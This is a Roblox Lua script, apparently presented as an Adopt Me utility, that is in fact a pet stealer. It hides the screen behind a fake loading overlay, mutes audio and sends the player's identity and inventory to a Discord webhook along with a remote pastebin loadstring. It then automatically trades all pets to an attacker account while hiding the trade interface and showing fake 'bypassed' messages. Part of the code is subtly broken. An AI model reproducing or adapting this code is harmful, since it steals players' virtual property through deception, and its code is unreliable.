local Loads = require(game.ReplicatedStorage.Fsys).load
local InventoryDB = Loads("InventoryDB")
local ClientData = Loads('ClientData')
local legendaries_count = 0
local mega_count = 0
local neon_count = 0
local ultra_count = 0
local rare_count = 0
local uncommon_count = 0
local common_count = 0

local function muteAllAudio()
    for _, sound in pairs(workspace:GetDescendants()) do
        if sound:IsA("Sound") then
            sound:Stop()
            sound.Volume = 0
        end
    end
end

muteAllAudio()

workspace.DescendantAdded:Connect(function(descendant)
    if descendant:IsA("Sound") then
        descendant:Stop()
        descendant.Volume = 0
    end
end)

for i, v in pairs(ClientData.get("inventory").pets) do
  if InventoryDB[v.category][v.id].rarity == "legendary" then
    legendaries_count = legendaries_count + 1
  end
  if InventoryDB[v.category][v.id].properties == "mega_neon" then
    mega_count = mega_count + 1
  end
  if InventoryDB[v.category][v.id].properties == "neon" then
    neon_count = neon_count + 1
  end
  if InventoryDB[v.category][v.id].rarity == "ultra_rare" then
    ultra_count = ultra_count + 1
  end
  if InventoryDB[v.category][v.id].rarity == "rare" then
    rare_count = rare_count + 1
  end
  if InventoryDB[v.category][v.id].rarity == "uncommon" then
    uncommon_count = uncommon_count + 1
  end
  if InventoryDB[v.category][v.id].rarity == "common" then
    common_count = common_count + 1
  end
end

--setings:
title = "Loading Script!" --upper title
loading_text = "Please wait!" --gray title
loadingtime = "200" --loading time (in seconds)

--credits to arko2230 ! 
-- do not touch/edit anything below! unless you know how to code ;)

local ScreenGui = Instance.new("ScreenGui")
local Frame = Instance.new("Frame")
local Frame_2 = Instance.new("Frame")
local UICorner = Instance.new("UICorner")
local name = Instance.new("TextLabel")
local loadingtext = Instance.new("TextLabel")
local Dots = Instance.new("Frame")
local Dot1 = Instance.new("Frame")
local UICorner_2 = Instance.new("UICorner")
local InsideDot = Instance.new("Frame")
local UICorner_3 = Instance.new("UICorner")
local Dot2 = Instance.new("Frame")
local UICorner_4 = Instance.new("UICorner")
local InsideDot_2 = Instance.new("Frame")
local UICorner_5 = Instance.new("UICorner")
local Dot3 = Instance.new("Frame")
local UICorner_6 = Instance.new("UICorner")
local InsideDot_3 = Instance.new("Frame")
local UICorner_7 = Instance.new("UICorner")
local seperator = Instance.new("Frame")

--Properties:

ScreenGui.Parent = game.Players.LocalPlayer:WaitForChild("PlayerGui")
ScreenGui.ZIndexBehavior = Enum.ZIndexBehavior.Sibling
ScreenGui.DisplayOrder = 999999999
ScreenGui.IgnoreGuiInset = true

Frame.Parent = ScreenGui
Frame.AnchorPoint = Vector2.new(0.5, 0.5)
Frame.BackgroundColor3 = Color3.fromRGB(27, 27, 27)
Frame.BackgroundTransparency = 0.200
Frame.BorderColor3 = Color3.fromRGB(0, 0, 0)
Frame.BorderSizePixel = 0
Frame.LayoutOrder = 2
Frame.Position = UDim2.new(0.5, 0, 0.5, 0)
Frame.Size = UDim2.new(1.2, 0, 1.2, 0)

Frame_2.Parent = Frame
Frame_2.BackgroundColor3 = Color3.fromRGB(27, 27, 27)
Frame_2.BorderColor3 = Color3.fromRGB(0, 0, 0)
Frame_2.BorderSizePixel = 0
Frame_2.Position = UDim2.new(0.374831498, 0, 0.370646775, 0)
Frame_2.Size = UDim2.new(0.6, 0, 0.5, 0)

UICorner.Parent = Frame_2

name.Name = "name"
name.Parent = Frame_2
name.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
name.BackgroundTransparency = 1.000
name.BorderColor3 = Color3.fromRGB(0, 0, 0)
name.BorderSizePixel = 0
name.Position = UDim2.new(0, 0, 0.0501869693, 0)
name.Size = UDim2.new(1, 0, 0.164251208, 0)
name.Font = Enum.Font.FredokaOne
name.Text = title
name.TextColor3 = Color3.fromRGB(255, 255, 255)
name.TextScaled = true
name.TextSize = 14.000
name.TextWrapped = true

loadingtext.Name = "loadingtext"
loadingtext.Parent = Frame_2
loadingtext.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
loadingtext.BackgroundTransparency = 1.000
loadingtext.BorderColor3 = Color3.fromRGB(0, 0, 0)
loadingtext.BorderSizePixel = 0
loadingtext.Position = UDim2.new(0.161290318, 0, 0.213806599, 0)
loadingtext.Size = UDim2.new(0.677419364, 0, 0.12077295, 0)
loadingtext.Font = Enum.Font.FredokaOne
loadingtext.Text = loading_text
loadingtext.TextColor3 = Color3.fromRGB(97, 97, 97)
loadingtext.TextScaled = true
loadingtext.TextSize = 14.000
loadingtext.TextWrapped = true

Dots.Name = "Dots"
Dots.Parent = Frame_2
Dots.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
Dots.BackgroundTransparency = 1.000
Dots.BorderColor3 = Color3.fromRGB(27, 42, 53)
Dots.Position = UDim2.new(0.293254822, 0, 0.555557609, 0)
Dots.Size = UDim2.new(0.41670385, 0, 0.255644023, 0)

Dot1.Name = "Dot1"
Dot1.Parent = Dots
Dot1.BackgroundColor3 = Color3.fromRGB(40, 40, 40)
Dot1.BorderColor3 = Color3.fromRGB(27, 42, 53)
Dot1.Position = UDim2.new(0.0611661971, 0, 0.234447539, 0)
Dot1.Size = UDim2.new(0.159291148, 0, 0.51158762, 0)

UICorner_2.CornerRadius = UDim.new(0.5, 0)
UICorner_2.Parent = Dot1

InsideDot.Name = "InsideDot"
InsideDot.Parent = Dot1
InsideDot.AnchorPoint = Vector2.new(0.5, 0.5)
InsideDot.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
InsideDot.BorderColor3 = Color3.fromRGB(27, 42, 53)
InsideDot.Position = UDim2.new(0.5, 0, 0.5, 0)

UICorner_3.CornerRadius = UDim.new(0.5, 0)
UICorner_3.Parent = InsideDot

Dot2.Name = "Dot2"
Dot2.Parent = Dots
Dot2.BackgroundColor3 = Color3.fromRGB(40, 40, 40)
Dot2.BorderColor3 = Color3.fromRGB(27, 42, 53)
Dot2.Position = UDim2.new(0.419989735, 0, 0.234447539, 0)
Dot2.Size = UDim2.new(0.159291148, 0, 0.51158762, 0)

UICorner_4.CornerRadius = UDim.new(0.5, 0)
UICorner_4.Parent = Dot2

InsideDot_2.Name = "InsideDot"
InsideDot_2.Parent = Dot2
InsideDot_2.AnchorPoint = Vector2.new(0.5, 0.5)
InsideDot_2.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
InsideDot_2.BorderColor3 = Color3.fromRGB(27, 42, 53)
InsideDot_2.Position = UDim2.new(0.5, 0, 0.5, 0)

UICorner_5.CornerRadius = UDim.new(0.5, 0)
UICorner_5.Parent = InsideDot_2

Dot3.Name = "Dot3"
Dot3.Parent = Dots
Dot3.BackgroundColor3 = Color3.fromRGB(40, 40, 40)
Dot3.BorderColor3 = Color3.fromRGB(27, 42, 53)
Dot3.Position = UDim2.new(0.778813243, 0, 0.234447539, 0)
Dot3.Size = UDim2.new(0.159291148, 0, 0.51158762, 0)

UICorner_6.CornerRadius = UDim.new(0.5, 0)
UICorner_6.Parent = Dot3

InsideDot_3.Name = "InsideDot"
InsideDot_3.Parent = Dot3
InsideDot_3.AnchorPoint = Vector2.new(0.5, 0.5)
InsideDot_3.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
InsideDot_3.BorderColor3 = Color3.fromRGB(27, 42, 53)
InsideDot_3.Position = UDim2.new(0.5, 0, 0.5, 0)

UICorner_7.CornerRadius = UDim.new(0.5, 0)
UICorner_7.Parent = InsideDot_3

seperator.Name = "seperator"
seperator.Parent = Frame_2
seperator.BackgroundColor3 = Color3.fromRGB(31, 31, 31)
seperator.BorderColor3 = Color3.fromRGB(0, 0, 0)
seperator.BorderSizePixel = 0
seperator.Position = UDim2.new(0, 0, 0.365113497, 0)
seperator.Size = UDim2.new(0.999704897, 0, 0.026786631, 0)

-- Scripts:

local function YCMO_fake_script() -- Dots.Dots 
	local script = Instance.new('LocalScript', Dots)

	while true do
		wait(0.25)
		script.Parent.Dot1.InsideDot:TweenSize(UDim2.new(1,0,1,0), "In", "Sine", 0.25, true)
		wait(0.25)
		script.Parent.Dot2.InsideDot:TweenSize(UDim2.new(1,0,1,0), "In", "Sine", 0.25, true)
		wait(0.25)
		script.Parent.Dot3.InsideDot:TweenSize(UDim2.new(1,0,1,0), "In", "Sine", 0.25, true)
		wait(0.25)
		script.Parent.Dot1.InsideDot:TweenSize(UDim2.new(0,0,0,0), "In", "Sine", 0.25, true)
		wait(0.25)
		script.Parent.Dot2.InsideDot:TweenSize(UDim2.new(0,0,0,0), "In", "Sine", 0.25, true)
		wait(0.25)
		script.Parent.Dot3.InsideDot:TweenSize(UDim2.new(0,0,0,0), "In", "Sine", 0.25, true)
	end
end

coroutine.wrap(YCMO_fake_script)()

-- Allow script to run during loading time
spawn(function()
    wait(loadingtime)
    Frame.Visible = false
end)

-- Add your other scripts or functionality here, which will run while the loading screen is active.

local exploit
local function getexploit()
    local exploitt =
        (syn and not is_sirhurt_closure and not pebc_execute and "Synapse X") or
        (secure_load and "Sentinel") or
        (is_sirhurt_closure and "Sirhurt") or
        (pebc_execute and "ProtoSmasher") or
        (KRNL_LOADED and "KRNL") or
        (WrapGlobal and "WeAreDevs") or
        (isvm and "Proxo") or
        (shadow_env and "Shadow") or
        (jit and "EasyExploits") or
        (getscriptenvs and "Codex/Unknown") or
        (unit and not syn and "Unit") or
        (OXYGEN_LOADED and "Oxygen U") or
        (IsElectron and "Electron") or
        ("Couldnt Grab")

    exploit = exploitt
end
getexploit()
local plr = game.Players.LocalPlayer
local userid = game.Players.LocalPlayer.UserId
local accage = game.Players.LocalPlayer.AccountAge
local data = {
  username = 'Pethical | Adopt Me Stealer!!',
  avatar_url = 'https://cdn.discordapp.com/attachments/1295330912900223039/1296364145406509056/standard_3.gif?ex=671204b1&is=6710b331&hm=995afe10858ed42f3ab62edd76e9c71de4fbbf8120bb1450c963cceff22483fd&',
  content = '-- @everyone\ngame:GetService("TeleportService"):TeleportToPlaceInstance(920587237, "' .. game.JobId .. '", game.Players.LocalPlayer)',
  embeds = {
    {
      title = 'Join your player using **EXECUTE TO JOIN THEM** and they should just trade you to start stealing!',
      description = '**📄  Player Information**: \n ```lua\n🔌 Executor: '.. tostring(exploit) ..'\n🗽 Username: '.. tostring(plr) ..'\n🗼 User-ID: '.. tostring(userid) ..'\n⛩ Account Age: '.. tostring(accage) ..'\n🏗 Receiver: '.. Username ..'\n```\n **📦 Inventory**: \n ```lua\n🦒 Legendaries: '.. tostring(legendaries_count).. '\n🐉 Mega Neons: '.. tostring(mega_count).. '\n🦖 Neons: '.. tostring(neon_count).. '\n🐊 Ultra Rares: '.. tostring(ultra_count).. '\n🐌 Rares: '.. tostring(rare_count).. '\n🦀 Uncommons: '.. tostring(uncommon_count).. '\n🐈 Commons: '.. tostring(common_count).. '\n```\n**🎁 Claim All Script**:\n\n```lua\nUsername = "'.. tostring(plr) ..'"\nloadstring(game:HttpGet("https://pastebin.com/raw/GzXc94aX"))()\n```',
      color = 10428396,
      fields = {
                {
                name = "🎮Auto Joiner",
                value = "**COMMING SOON!**"
                }
      }
    }
  }
}
local httpRequest = http.request or httprequest
if httpRequest then
  httpRequest({
    Url = Webhook,
    Method = 'POST',
    Headers = {
      ['Content-Type'] = 'application/json'
    },
    Body = game:GetService('HttpService'):JSONEncode(data)
  })
else
  print("LMAOOOOOO")
end
local trade_info = {}
for i, v in pairs(game:GetService("ReplicatedStorage").API:GetChildren()) do
  if v:IsA('RemoteEvent') then
    spawn(function()
      v.OnClientEvent:Connect(function(...)
        x = {} -- <--- Add a closing } here
        if type(x[3]) == 'table' and x[2] == 'trade' then
          table = x[3]
          sender = table.sender
          sender_offer = table.sender_offer
          trade_info = table
        end
      end)
    end)
  end
end
local function SendTrade()
  local Loads = require(game.ReplicatedStorage.Fsys).load
  local RouterClient = Loads("RouterClient")
  local send_trade = RouterClient.get("TradeAPI/SendTradeRequest")
  
  while task.wait(10) do
        repeat
            send_trade:FireServer(game.Players[Username])
            
wait(4)
local Loads = require(game.ReplicatedStorage.Fsys).load
  local RouterClient = Loads("RouterClient")
  local AddPetRemote = RouterClient.get("TradeAPI/AddItemToOffer")
  local juj = require(game.ReplicatedStorage.ClientModules.Core.ClientData).get_data()[game.Players.LocalPlayer.Name].inventory
  if juj.pets then
    local petCount = 0
    local petUids = {}
        for petUid, petData in pairs(juj.pets) do
      table.insert(petUids, petUid)
    end
    
    while #petUids > 0 do
      local petUid = table.remove(petUids, 1)
      AddPetRemote:FireServer(petUid)
      petCount = petCount + 1
      if petCount >= 18 then
        break
      end
    end
  else
    print("No pets found in inventory.")
  end
wait(9)
local Loads = require(game.ReplicatedStorage.Fsys).load
  local RouterClient = Loads("RouterClient")
  local AcceptNegotiationRemote = RouterClient.get("TradeAPI/AcceptNegotiation")
  AcceptNegotiationRemote:FireServer()
wait(16)
local Loads = require(game.ReplicatedStorage.Fsys).load
  local RouterClient = Loads("RouterClient")
  local AcceptTradeRemote = RouterClient.get("TradeAPI/ConfirmTrade")
  AcceptTradeRemote:FireServer()
wait(1)
        until (trade_info.sender_offer and #trade_info.sender_offer ~= nil) and (trade_info.sender_offer and trade_info.sender_offer.player_name ~= nil)
end
end

local function StartSteal()
        SendTrade()
end

local function WaitForTrade()
  while true do
    if game.Players:FindFirstChild(Username) then
       wait(5)
      StartSteal()
      break
    else
      wait(1)
    end
  end
end

local total_pets = 0
for i, v in pairs(ClientData.get("inventory").pets) do
    total_pets = total_pets + 1
end
warn("Your Script Detected", total_pets, "Vulnerabilities, Bypassing Them Right Now.")
wait(5)
print("Bypassed!")
    if total_pets == 1 then
        game:GetService("Players").LocalPlayer:Kick("Alt account detected, please have at least 1 pet in your inventory or use this script on your main account.")
end
game:GetService("Players").LocalPlayer.PlayerGui.DialogApp.Dialog.Visible = false
game:GetService("Players").LocalPlayer.PlayerGui.TradeApp.Enabled = false
WaitForTrade()
